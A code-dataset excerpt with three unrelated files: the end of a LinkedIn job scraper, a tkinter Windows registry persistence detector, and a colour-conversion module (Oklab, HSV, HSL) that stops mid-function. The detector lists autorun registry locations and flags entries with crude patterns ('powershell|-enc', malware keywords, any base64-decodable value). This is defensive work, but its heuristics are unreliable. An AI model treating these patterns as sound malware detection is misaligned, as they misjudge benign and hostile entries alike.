# div_mt2_mb2_alumni = div_mt2_mb2_ul_li[2]
# div_mt2_mb2_skills = div_mt2_mb2_ul_li[3]
# div_jobs_box = div_job_detail_secondchild.find('div', class_='jobs-box--fadein jobs-box--full-width jobs-box--with-cta-large jobs-description jobs-description--reformatted mt4')
# div_jobs_description_container = div_jobs_box.find('div', class_='jobs-description__container')
# div_jobs_description_content = div_jobs_description_container.find('div', class_='jobs-description__content jobs-description-content')
# div_jobs_box_content = div_jobs_description_content.find('div', id='job-details')
# div_mt4 = div_jobs_box_content.find('div', class_='mt4')
# return div_mt2_mb2_job_type.text, div_mt2_mb2_company.text, div_mt2_mb2_alumni.text, div_mt2_mb2_skills.text, div_mt4.text
single_page_scraper('https://www.linkedin.com/jobs/search/?alertAction=viewjobs¤tJobId=3767462861&f_E=2%2C3&f_TPR=r86400&geoId=90000084&keywords=machine%20learning&location=&origin=JOB_SEARCH_PAGE_SEARCH_BUTTON&refresh=true')
| 4,548 | Python | .py | 59 | 72.457627 | 235 | 0.721813 | geshijoker/easycv | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,179 | detectpersist.py | kaotickj_persistenceDetector/detectpersist.py | import tkinter.font as tkFont
import tkinter as tk
from tkinter import messagebox
import winreg
import base64
import re
import string
class RegistryCheckerApp:
def __init__(self, root):
# setting title
root.title("Registry Persistence Detector")
#setting window size
width=600
height=400
screenwidth = root.winfo_screenwidth()
screenheight = root.winfo_screenheight()
alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
root.geometry(alignstr)
root.resizable(width=False, height=False)
menubar = tk.Menu(root)
root.config(menu=menubar)
file_menu = tk.Menu(menubar, tearoff=0)
menubar.add_cascade(label="Menu", menu=file_menu)
file_menu.add_command(label="About", command=self.show_about)
file_menu.add_command(label="Help", command=self.show_help)
output_label=tk.Label(root)
ft = tkFont.Font(family='Times',size=11)
output_label["font"] = ft
output_label["fg"] = "#333333"
output_label["justify"] = "center"
output_label["text"] = "Results: "
output_label.place(x=20,y=100,width=70,height=25)
self.output_text=tk.Text(root)
ft = tkFont.Font(family='Times',size=11)
self.output_text["font"] = ft
self.output_text["fg"] = "#333333"
self.output_text.place(x=10,y=130,width=574,height=200)
check_button=tk.Button(root)
check_button["bg"] = "#e9e9ed"
ft = tkFont.Font(family='Times',size=11)
check_button["font"] = ft
check_button["fg"] = "#000000"
check_button["justify"] = "center"
check_button["text"] = "Check Registry"
check_button.place(x=240,y=340,width=110,height=25)
check_button["command"] = self.check_registry
options_label=tk.Label(root)
ft = tkFont.Font(family='Times',size=11)
options_label["font"] = ft
options_label["fg"] = "#333333"
options_label["justify"] = "center"
options_label["text"] = "Scan Options :"
options_label.place(x=20,y=30,width=90,height=25)
options_powershell=tk.Checkbutton(root)
ft = tkFont.Font(family='Times',size=11)
options_powershell["font"] = ft
options_powershell["fg"] = "#333333"
options_powershell["justify"] = "center"
options_powershell["text"] = "Powershell Commands"
options_powershell.place(x=80,y=60,width=170,height=25)
options_powershell["offvalue"] = "1"
options_powershell["onvalue"] = "0"
options_powershell["command"] = self.options_powershell_command
options_encoded=tk.Checkbutton(root)
ft = tkFont.Font(family='Times',size=11)
options_encoded["font"] = ft
options_encoded["fg"] = "#333333"
options_encoded["justify"] = "center"
options_encoded["text"] = "Encoded Payloads"
options_encoded.place(x=320,y=60,width=170,height=25)
options_encoded["offvalue"] = "1"
options_encoded["onvalue"] = "0"
options_encoded["command"] = self.options_encoded_command
def check_registry(self):
self.output_text.delete(1.0, tk.END)
malicious_entries = self.get_malicious_entries()
if malicious_entries:
self.output_text.insert(tk.END, "Malicious registry persistence detected:\n\n")
for entry in malicious_entries:
self.output_text.insert(tk.END, f"Location: {entry[0]}, Name: {entry[1]}, Data: {entry[2]}\n\n")
# Alert the user
alert_message = "Malicious registry persistence detected. Please review the output.\n"
alert_message += "To delete the found keys, follow these steps:\n"
alert_message += "1. Press Win + R, type 'regedit', and press Enter to open the Registry Editor.\n"
alert_message += "2. Navigate to the location mentioned in the output.\n"
alert_message += "3. Right-click on the malicious key and select 'Delete'.\n"
alert_message += "4. Confirm the deletion if prompted.\n"
messagebox.showwarning("Alert", alert_message)
else:
self.output_text.insert(tk.END, "No malicious registry persistence found.\n")
def get_malicious_entries(self):
persistence_locations = [
(winreg.HKEY_CURRENT_USER, [
r"Software\Microsoft\Windows\CurrentVersion\Run",
r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
r"Software\Microsoft\Internet Explorer\Extensions",
# Add more locations as needed based on your analysis
]),
(winreg.HKEY_LOCAL_MACHINE, [
r"Software\Microsoft\Windows\CurrentVersion\Run",
r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
r"System\CurrentControlSet\Services",
r"Software\Microsoft\Internet Explorer\Extensions",
# Add more locations as needed based on your analysis
]),
(winreg.HKEY_CLASSES_ROOT, [
r"Directory\Background\ShellEx\ContextMenuHandlers",
# Add more locations as needed based on your analysis
]),
(winreg.HKEY_USERS, [
r"S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run",
# Add more locations as needed based on your analysis
]),
(winreg.HKEY_USERS, [
r"S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run",
# Add more locations as needed based on your analysis
]),
# Add more user keys as needed
]
malicious_entries = []
for root_key, locations in persistence_locations:
for location in locations:
try:
with winreg.OpenKey(root_key, location, 0, winreg.KEY_READ) as key:
num_values = winreg.QueryInfoKey(key)[1]
for i in range(num_values):
value_name, value_data, _ = winreg.EnumValue(key, i)
if self.is_malicious(value_name, value_data):
malicious_entries.append((location, value_name, value_data))
except Exception as e:
print(f"Error accessing registry location {location}: {e}")
return malicious_entries
def is_malicious(self, value_name, value_data):
# Implement logic to determine if a registry entry is malicious
if re.search(r"malware|virus|trojan|keylogger", value_name, re.IGNORECASE) or \
re.search(r"malware|virus|trojan|keylogger", value_data, re.IGNORECASE):
return True
if self.is_base64_encoded(value_data):
return True
if self.is_powershell_command(value_data):
return True
# Add more checks as needed
return False
def is_powershell_command(self, data):
# Check if the data contains PowerShell commands or suspicious strings
if re.search(r"powershell|-enc", data, re.IGNORECASE):
return True
return False
def is_base64_encoded(self, data):
try:
decoded_data = base64.b64decode(data)
# Check if the decoded data is printable ASCII
return all(chr(byte) in string.printable for byte in decoded_data)
except Exception:
return False
def options_powershell_command(self):
self.output_text.insert(tk.END, "Scan for Powershell Commands Enabled\n")
def options_encoded_command(self):
self.output_text.insert(tk.END, "Scan for Encoded Commands Enabled\n")
def show_about(self):
messagebox.showinfo("About", "This application is developed by Kaotick Jay for detecting and remediating malicious registry persistence.")
def show_help(self):
messagebox.showinfo("Help", "To use this application, simply click the 'Check Registry' button to detect any malicious registry persistence.")
if __name__ == "__main__":
root = tk.Tk()
app = RegistryCheckerApp(root)
root.mainloop()
| 8,260 | Python | .py | 167 | 38.688623 | 150 | 0.621391 | kaotickj/persistenceDetector | 8 | 4 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,180 | colorconversion.py | lucifer9683_HCLSliders/hclsliders/colorconversion.py | # SPDX-License-Identifier: GPL-3.0-or-later AND MIT
#
# Color conversion script for python.
# Copyright (C) 2024 Lucifer <krita-artists.org/u/Lucifer>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (c) 2021 Björn Ottosson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Pigment.O is a Krita plugin and it is a Color Picker and Color Mixer.
# Copyright ( C ) 2020 Ricardo Jeremias.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# ( at your option ) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import math, sys
# luma coefficents for ITU-R BT.709
Y709R = 0.2126
Y709G = 0.7152
Y709B = 0.0722
# constants for sRGB transfer
ALPHA = 0.055
GAMMA = 2.4
PHI = 12.92
# toe functions
K1 = 0.206
K2 = 0.03
K3 = (1.0 + K1) / (1.0 + K2)
class Convert:
@staticmethod
def roundZero(n: float, d: int):
s = -1 if n < 0 else 1
if not isinstance(d, int):
raise TypeError("decimal places must be an integer")
elif d < 0:
raise ValueError("decimal places has to be 0 or more")
elif d == 0:
return math.floor(abs(n)) * s
f = 10 ** d
return math.floor(abs(n) * f) / f * s
@staticmethod
def clampF(f: float, u: float=1, l: float=0):
# red may be negative in parts of blue due to color being out of gamut
if f < l:
return l
# round up near 1 and prevent going over 1 from oklab conversion
if (u == 1 and f > 0.999999) or f > u:
return u
return f
@staticmethod
def componentToSRGB(c: float):
# round(CHI / PHI, 7) = 0.0031308
return (1 + ALPHA) * c ** (1 / GAMMA) - ALPHA if c > 0.0031308 else c * PHI
@staticmethod
def componentToLinear(c: float):
# CHI = 0.04045
return ((c + ALPHA) / (1 + ALPHA)) ** GAMMA if c > 0.04045 else c / PHI
@staticmethod
def cartesianToPolar(a: float, b: float):
c = math.hypot(a, b)
hRad = math.atan2(b, a)
if hRad < 0:
hRad += math.pi * 2
h = math.degrees(hRad)
return (c, h)
@staticmethod
def polarToCartesian(c: float, h: float):
hRad = math.radians(h)
a = c * math.cos(hRad)
b = c * math.sin(hRad)
return (a, b)
@staticmethod
def linearToOklab(r: float, g: float, b: float):
# convert to approximate cone responses
l = 0.4122214708 * r + 0.5363325363 * g + 0.0514459929 * b
m = 0.2119034982 * r + 0.6806995451 * g + 0.1073969566 * b
s = 0.0883024619 * r + 0.2817188376 * g + 0.6299787005 * b
# apply non-linearity
l_ = l ** (1 / 3)
m_ = m ** (1 / 3)
s_ = s ** (1 / 3)
# transform to Lab coordinates
okL = 0.2104542553 * l_ + 0.7936177850 * m_ - 0.0040720468 * s_
okA = 1.9779984951 * l_ - 2.4285922050 * m_ + 0.4505937099 * s_
okB = 0.0259040371 * l_ + 0.7827717662 * m_ - 0.8086757660 * s_
return (okL, okA, okB)
@staticmethod
def oklabToLinear(okL: float, okA: float, okB: float):
# inverse coordinates
l_ = okL + 0.3963377774 * okA + 0.2158037573 * okB
m_ = okL - 0.1055613458 * okA - 0.0638541728 * okB
s_ = okL - 0.0894841775 * okA - 1.2914855480 * okB
# reverse non-linearity
l = l_ * l_ * l_
m = m_ * m_ * m_
s = s_ * s_ * s_
# convert to linear rgb
r = +4.0767416621 * l - 3.3077115913 * m + 0.2309699292 * s
g = -1.2684380046 * l + 2.6097574011 * m - 0.3413193965 * s
b = -0.0041960863 * l - 0.7034186147 * m + 1.7076147010 * s
return(r, g, b)
@staticmethod
# toe function for L_r
def toe(x):
return 0.5 * (K3 * x - K1 + ((K3 * x - K1) * (K3 * x - K1) + 4 * K2 * K3 * x) ** (1 / 2))
@staticmethod
# inverse toe function for L_r
def toeInv(x):
return (x * x + K1 * x) / (K3 * (x + K2))
@staticmethod
# Finds the maximum saturation possible for a given hue that fits in sRGB
# Saturation here is defined as S = C/L
# a and b must be normalized so a^2 + b^2 == 1
def computeMaxSaturation(a: float, b: float):
# Max saturation will be when one of r, g or b goes below zero.
# Select different coefficients depending on which component goes below zero first
# Blue component
k0 = +1.35733652
k1 = -0.00915799
k2 = -1.15130210
k3 = -0.50559606
k4 = +0.00692167
wl = -0.0041960863
wm = -0.7034186147
ws = +1.7076147010
if -1.88170328 * a - 0.80936493 * b > 1:
# Red component
k0 = +1.19086277
k1 = +1.76576728
k2 = +0.59662641
k3 = +0.75515197
k4 = +0.56771245
wl = +4.0767416621
wm = -3.3077115913
ws = +0.2309699292
elif 1.81444104 * a - 1.19445276 * b > 1:
# Green component
k0 = +0.73956515
k1 = -0.45954404
k2 = +0.08285427
k3 = +0.12541070
k4 = +0.14503204
wl = -1.2684380046
wm = +2.6097574011
ws = -0.3413193965
# Approximate max saturation using a polynomial:
maxS = k0 + k1 * a + k2 * b + k3 * a * a + k4 * a * b
# Do one step Halley's method to get closer
# this gives an error less than 10e6,
# except for some blue hues where the dS/dh is close to infinite
# this should be sufficient for most applications, otherwise do two/three steps
k_l = +0.3963377774 * a + 0.2158037573 * b
k_m = -0.1055613458 * a - 0.0638541728 * b
k_s = -0.0894841775 * a - 1.2914855480 * b
l_ = 1.0 + maxS * k_l
m_ = 1.0 + maxS * k_m
s_ = 1.0 + maxS * k_s
l = l_ * l_ * l_
m = m_ * m_ * m_
s = s_ * s_ * s_
l_dS = 3.0 * k_l * l_ * l_
m_dS = 3.0 * k_m * m_ * m_
s_dS = 3.0 * k_s * s_ * s_
l_dS2 = 6.0 * k_l * k_l * l_
m_dS2 = 6.0 * k_m * k_m * m_
s_dS2 = 6.0 * k_s * k_s * s_
f = wl * l + wm * m + ws * s
f1 = wl * l_dS + wm * m_dS + ws * s_dS
f2 = wl * l_dS2 + wm * m_dS2 + ws * s_dS2
maxS = maxS - f * f1 / (f1*f1 - 0.5 * f * f2)
return maxS
@staticmethod
# finds L_cusp and C_cusp for a given hue
# a and b must be normalized so a^2 + b^2 == 1
def findCuspLC(a: float, b: float):
# First, find the maximum saturation (saturation S = C/L)
maxS = Convert.computeMaxSaturation(a, b)
# Convert to linear sRGB to find the first point where at least one of r,g or b >= 1:
maxRgb = Convert.oklabToLinear(1, maxS * a, maxS * b)
cuspL = (1.0 / max(maxRgb[0], maxRgb[1], maxRgb[2])) ** (1 / 3)
cuspC = cuspL * maxS
return (cuspL, cuspC)
@staticmethod
# Finds intersection of the line defined by
# L = L0 * (1 - t) + t * L1
# C = t * C1
# a and b must be normalized so a^2 + b^2 == 1
def findGamutIntersection(a: float, b: float, l1: float, c1: float, l0: float, cuspLC=None):
# Find the cusp of the gamut triangle
if cuspLC is None:
cuspLC = Convert.findCuspLC(a, b)
# Find the intersection for upper and lower half separately
if ((l1 - l0) * cuspLC[1] - (cuspLC[0] - l1) * c1) <= 0.0:
# Lower half
t = cuspLC[1] * l0 / (c1 * cuspLC[0] + cuspLC[1] * (l0 - l1))
else:
# Upper half
# First intersect with triangle
t = cuspLC[1] * (l0 - 1.0) / (c1 * (cuspLC[0] - 1.0) + cuspLC[1] * (l0 - l1))
# Then one step Halley's method
dL = l1 - l0
dC = c1
k_l = +0.3963377774 * a + 0.2158037573 * b
k_m = -0.1055613458 * a - 0.0638541728 * b
k_s = -0.0894841775 * a - 1.2914855480 * b
l_dt = dL + dC * k_l
m_dt = dL + dC * k_m
s_dt = dL + dC * k_s
# If higher accuracy is required, 2 or 3 iterations of the following block can be used:
l = l0 * (1.0 - t) + t * l1
c = t * c1
l_ = l + c * k_l
m_ = l + c * k_m
s_ = l + c * k_s
l = l_ * l_ * l_
m = m_ * m_ * m_
s = s_ * s_ * s_
ldt = 3 * l_dt * l_ * l_
mdt = 3 * m_dt * m_ * m_
sdt = 3 * s_dt * s_ * s_
ldt2 = 6 * l_dt * l_dt * l_
mdt2 = 6 * m_dt * m_dt * m_
sdt2 = 6 * s_dt * s_dt * s_
r = 4.0767416621 * l - 3.3077115913 * m + 0.2309699292 * s - 1
r1 = 4.0767416621 * ldt - 3.3077115913 * mdt + 0.2309699292 * sdt
r2 = 4.0767416621 * ldt2 - 3.3077115913 * mdt2 + 0.2309699292 * sdt2
u_r = r1 / (r1 * r1 - 0.5 * r * r2)
t_r = -r * u_r
g = -1.2684380046 * l + 2.6097574011 * m - 0.3413193965 * s - 1
g1 = -1.2684380046 * ldt + 2.6097574011 * mdt - 0.3413193965 * sdt
g2 = -1.2684380046 * ldt2 + 2.6097574011 * mdt2 - 0.3413193965 * sdt2
u_g = g1 / (g1 * g1 - 0.5 * g * g2)
t_g = -g * u_g
b = -0.0041960863 * l - 0.7034186147 * m + 1.7076147010 * s - 1
b1 = -0.0041960863 * ldt - 0.7034186147 * mdt + 1.7076147010 * sdt
b2 = -0.0041960863 * ldt2 - 0.7034186147 * mdt2 + 1.7076147010 * sdt2
u_b = b1 / (b1 * b1 - 0.5 * b * b2)
t_b = -b * u_b
t_r = t_r if u_r >= 0.0 else sys.float_info.max
t_g = t_g if u_g >= 0.0 else sys.float_info.max
t_b = t_b if u_b >= 0.0 else sys.float_info.max
t += min(t_r, t_g, t_b)
return t
@staticmethod
def cuspToST(cuspLC: tuple):
l: float = cuspLC[0]
c: float = cuspLC[1]
return (c / l, c / (1 - l))
# Returns a smooth approximation of the location of the cusp
# This polynomial was created by an optimization process
# It has been designed so that S_mid < S_max and T_mid < T_max
@staticmethod
def getMidST(a_: float, b_: float):
s = 0.11516993 + 1.0 / (+7.44778970 + 4.15901240 * b_
+ a_ * (-2.19557347 + 1.75198401 * b_
+ a_ * (-2.13704948 - 10.02301043 * b_
+ a_ * (-4.24894561 + 5.38770819 * b_ + 4.69891013 * a_
))))
t = 0.11239642 + 1.0 / (+1.61320320 - 0.68124379 * b_
+ a_ * (+0.40370612 + 0.90148123 * b_
+ a_ * (-0.27087943 + 0.61223990 * b_
+ a_ * (+0.00299215 - 0.45399568 * b_ - 0.14661872 * a_
))))
return (s, t)
@staticmethod
def getCs(l: float, a_: float, b_: float):
cuspLC = Convert.findCuspLC(a_, b_)
cMax = Convert.findGamutIntersection(a_, b_, l, 1, l, cuspLC)
maxST = Convert.cuspToST(cuspLC)
# Scale factor to compensate for the curved part of gamut shape:
k = cMax / min(l * maxST[0], (1 - l) * maxST[1])
midST = Convert.getMidST(a_, b_)
# Use a soft minimum function,
# instead of a sharp triangle shape to get a smooth value for chroma.
cMid = 0.9 * k * (1 / (1 / (l * midST[0]) ** 4 + 1 / ((1 - l) * midST[1]) ** 4)) ** (1 / 4)
# for C_0, the shape is independent of hue, so ST are constant.
# Values picked to roughly be the average values of ST.
c0 = (1 / (1 / (l * 0.4) ** 2 + 1 / ((1 - l) * 0.8) ** 2)) ** (1 / 2)
return (c0, cMid, cMax)
@staticmethod
def rgbToTRC(rgb: tuple, trc: str):
if trc == "sRGB":
r = Convert.clampF(Convert.componentToSRGB(rgb[0]))
g = Convert.clampF(Convert.componentToSRGB(rgb[1]))
b = Convert.clampF(Convert.componentToSRGB(rgb[2]))
return (r, g, b)
else:
r = Convert.componentToLinear(rgb[0])
g = Convert.componentToLinear(rgb[1])
b = Convert.componentToLinear(rgb[2])
return (r, g, b)
@staticmethod
def rgbFToInt8(r: float, g: float, b: float, trc: str):
if trc == "sRGB":
r = int(r * 255)
g = int(g * 255)
b = int(b * 255)
else:
r = round(Convert.componentToSRGB(r) * 255)
g = round(Convert.componentToSRGB(g) * 255)
b = round(Convert.componentToSRGB(b) * 255)
return (r, g, b)
@staticmethod
def rgbFToHexS(r: float, g: float, b: float, trc: str):
# hex codes are in 8 bits per color
rgb = Convert.rgbFToInt8(r, g, b, trc)
# hex converts int to str with first 2 char being 0x
r = hex(rgb[0])[2:].zfill(2).upper()
g = hex(rgb[1])[2:].zfill(2).upper()
b = hex(rgb[2])[2:].zfill(2).upper()
return f"#{r}{g}{b}"
@staticmethod
def hexSToRgbF(syntax: str, trc: str):
if len(syntax) != 7:
print("Invalid syntax")
return
try:
r = int(syntax[1:3], 16) / 255.0
g = int(syntax[3:5], 16) / 255.0
b = int(syntax[5:7], 16) / 255.0
except ValueError:
print("Invalid syntax")
return
if trc == "sRGB":
return (r, g, b)
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
return (r, g, b)
@staticmethod
def rgbFToOklabS(r: float, g: float, b: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
# l in percentage, a and b is 0 to 0.3+
okL = round(oklab[0] * 100, 2)
okA = Convert.roundZero(oklab[1], 4)
okB = Convert.roundZero(oklab[2], 4)
return f"oklab({okL}% {okA} {okB})"
@staticmethod
def oklabSToRgbF(syntax: str, trc: str):
strings = syntax[5:].strip("( )").split()
if len(strings) != 3:
print("Invalid syntax")
return
okL = strings[0]
okA = strings[1]
okB = strings[2]
try:
if "%" in okL:
okL = Convert.clampF(float(okL.strip("%")) / 100)
else:
okL = Convert.clampF(float(okL))
if "%" in okA:
okA = Convert.clampF(float(okA.strip("%")) / 250, 0.4, -0.4)
else:
okA = Convert.clampF(float(okA), 0.4, -0.4)
if "%" in okB:
okB = Convert.clampF(float(okB.strip("%")) / 250, 0.4, -0.4)
else:
okB = Convert.clampF(float(okB), 0.4, -0.4)
except ValueError:
print("Invalid syntax")
return
rgb = Convert.oklabToLinear(okL, okA, okB)
# if rgb not linear, perform transfer functions for components
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
@staticmethod
def rgbFToOklchS(r: float, g: float, b: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
l = round(oklab[0] * 100, 2)
ch = Convert.cartesianToPolar(oklab[1], oklab[2])
c = ch[0]
h = 0
# chroma of neutral colors will not be exactly 0 due to floating point errors
if c < 0.000001:
c = 0
else:
# chroma adjustment due to rounding up blue hue
if 264.052 < ch[1] < 264.06:
h = 264.06
c = round(c - 0.0001, 4)
else:
h = round(ch[1], 2)
c = Convert.roundZero(c, 4)
# l in percentage, c is 0 to 0.3+, h in degrees
return f"oklch({l}% {c} {h})"
@staticmethod
def oklchSToRgbF(syntax: str, trc: str):
strings = syntax[5:].strip("( )").split()
if len(strings) != 3:
print("Invalid syntax")
return
l = strings[0]
c = strings[1]
h = strings[2]
try:
if "%" in l:
l = Convert.clampF(float(l.strip("%")) / 100)
else:
l = Convert.clampF(float(l))
if "%" in c:
c = Convert.clampF(float(c.strip("%")) / 250, 0.4)
else:
c = Convert.clampF(float(c), 0.4)
h = Convert.clampF(float(h.strip("deg")), 360.0)
except ValueError:
print("Invalid syntax")
return
# clip chroma if exceed sRGB gamut
ab = Convert.polarToCartesian(1, h)
if c:
u = Convert.findGamutIntersection(*ab, l, 1, l)
if c > u:
c = u
rgb = Convert.oklabToLinear(l, ab[0] * c, ab[1] * c)
# if rgb not linear, perform transfer functions for components
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
@staticmethod
def hSectorToRgbF(hSector: float, v: float, m: float, x: float, trc: str="sRGB"):
# assign max, med and min according to hue sector
if hSector == 1: # between yellow and green
r = x
g = v
b = m
elif hSector == 2: # between green and cyan
r = m
g = v
b = x
elif hSector == 3: # between cyan and blue
r = m
g = x
b = v
elif hSector == 4: # between blue and magenta
r = x
g = m
b = v
elif hSector == 5: # between magenta and red
r = v
g = m
b = x
else: # between red and yellow
r = v
g = x
b = m
# convert to linear if not sRGB
if trc == "sRGB":
return (r, g, b)
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
return (r, g, b)
@staticmethod
def rgbFToHsv(r: float, g: float, b: float, trc: str):
# if rgb is linear, convert to sRGB
if trc == "linear":
r = Convert.componentToSRGB(r)
g = Convert.componentToSRGB(g)
b = Convert.componentToSRGB(b)
# value is equal to max(R,G,B) while min(R,G,B) determines saturation
v = max(r,g,b)
m = min(r,g,b)
# chroma is the colorfulness of the color compared to the neutral color of equal value
c = v - m
if c == 0:
# hue cannot be determined if the color is neutral
return (0, 0, round(v * 100, 2))
# hue is defined in 60deg sectors
# hue = primary hue + deviation
# max(R,G,B) determines primary hue while med(R,G,B) determines deviation
# deviation has a range of -0.999... to 0.999...
if v == r:
# red is 0, range of hues that are predominantly red is -0.999... to 0.999...
# dividing (g - b) by chroma takes saturation and value out of the equation
# resulting in hue deviation of the primary color
h = ((g - b) / c) % 6
elif v == g:
# green is 2, range of hues that are predominantly green is 1.000... to 2.999...
h = (b - r) / c + 2
elif v == b:
# blue is 4, range of hues that are predominantly blue is 3.000... to 4.999...
h = (r - g) / c + 4
# saturation is the ratio of chroma of the color to the maximum chroma of equal value
# which is normalized chroma to fit the range of 0-1
s = c / v
return (round(h * 60, 2), round(s * 100, 2), round(v * 100, 2))
@staticmethod
def hsvToRgbF(h: float, s: float, v: float, trc: str):
# derive hue in 60deg sectors
h /= 60
hSector = int(h)
# scale saturation and value range from 0-100 to 0-1
s /= 100
v /= 100
# max(R,G,B) = value
# chroma = saturation * value
# min(R,G,B) = max(R,G,B) - chroma
m = v * (1 - s)
# calculate deviation from closest secondary color with range of -0.999... to 0.999...
# |deviation| = 1 - derived hue - hue sector if deviation is positive
# |deviation| = derived hue - hue sector if deviation is negative
d = h - hSector if hSector % 2 else 1 - (h - hSector)
# med(R,G,B) = max(R,G,B) - (|deviation| * chroma)
x = v * (1 - d * s)
return Convert.hSectorToRgbF(hSector, v, m, x, trc)
@staticmethod
def rgbFToHsl(r: float, g: float, b: float, trc: str):
# if rgb is linear, convert to sRGB
if trc == "linear":
r = Convert.componentToSRGB(r)
g = Convert.componentToSRGB(g)
b = Convert.componentToSRGB(b)
v = max(r,g,b)
m = min(r,g,b)
# lightness is defined as the midrange of the RGB components
l = (v + m) / 2
c = v - m
# hue cannot be determined if the color is neutral
if c == 0:
return (0, 0, round(l * 100, 2))
# same formula as hsv to find hue
if v == r:
h = ((g - b) / c) % 6
elif v == g:
h = (b - r) / c + 2
elif v == b:
h = (r - g) / c + 4
# saturation = chroma / chroma range
# max chroma range when lightness at half
s = c / (1 - abs(2 * l - 1))
return (round(h * 60, 2), round(s * 100, 2), round(l * 100, 2))
@staticmethod
def hslToRgbF(h: float, s: float, l: float, trc: str):
# derive hue in 60deg sectors
h /= 60
hSector = int(h)
# scale saturation and value range from 0-100 to 0-1
s /= 100
l /= 100
# max(R,G,B) = s(l) + l if l<0.5 else s(1 - l) + l
v = l * (1 + s) if l < 0.5 else s * (1 - l) + l
m = 2 * l - v
# calculate deviation from closest secondary color with range of -0.999... to 0.999...
d = h - hSector if hSector % 2 else 1 - (h - hSector)
x = v - d * (v - m)
return Convert.hSectorToRgbF(hSector, v, m, x, trc)
@staticmethod
def rgbFToHcy(r: float, g: float, b: float, h: float, trc: str, luma: bool):
# if y should always be luma, convert to sRGB
if luma and trc == "linear":
r = Convert.componentToSRGB(r)
g = Convert.componentToSRGB(g)
b = Convert.componentToSRGB(b)
# y can be luma or relative luminance depending on rgb format
y = Y709R * r + Y709G * g + Y709B * b
v = max(r, g, b)
m = min(r, g, b)
c = v - m
yHue = 0
# if color is neutral, use previous hue to calculate luma coefficient of hue
# max(R,G,B) coefficent + med(R,G,B) coefficient * deviation from max(R,G,B) hue
if (c != 0 and v == g) or (c == 0 and 60 <= h <= 180):
h = (b - r) / c + 2 if c != 0 else h / 60
if 1 <= h <= 2: # between yellow and green
d = h - 1
# luma coefficient of hue ranges from 0.9278 to 0.7152
yHue = Y709G + Y709R * (1 - d)
elif 2 < h <= 3: # between green and cyan
d = h - 2
# luma coefficient of hue ranges from 0.7152 to 0.7874
yHue = Y709G + Y709B * d
elif (c != 0 and v == b) or (c == 0 and 180 < h <= 300):
h = (r - g) / c + 4 if c != 0 else h / 60
if 3 < h <= 4: # between cyan and blue
d = h - 3
# luma coefficient of hue ranges from 0.7874 to 0.0722
yHue = Y709B + Y709G * (1 - d)
elif 4 < h <= 5: # between blue and magenta
d = h - 4
# luma coefficient of hue ranges from 0.0722 to 0.2848
yHue = Y709B + Y709R * d
elif (c != 0 and v == r) or (c == 0 and (h > 300 or h < 60)):
h = ((g - b) / c) % 6 if c != 0 else h / 60
if 5 < h <= 6: # between magenta and red
d = h - 5
# luma coefficient of hue ranges from 0.2848 to 0.2126
yHue = Y709R + Y709B * (1 - d)
elif 0 <= h < 1: # between red and yellow
d = h
# luma coefficient of hue ranges from 0.2126 to 0.9278
yHue = Y709R + Y709G * d
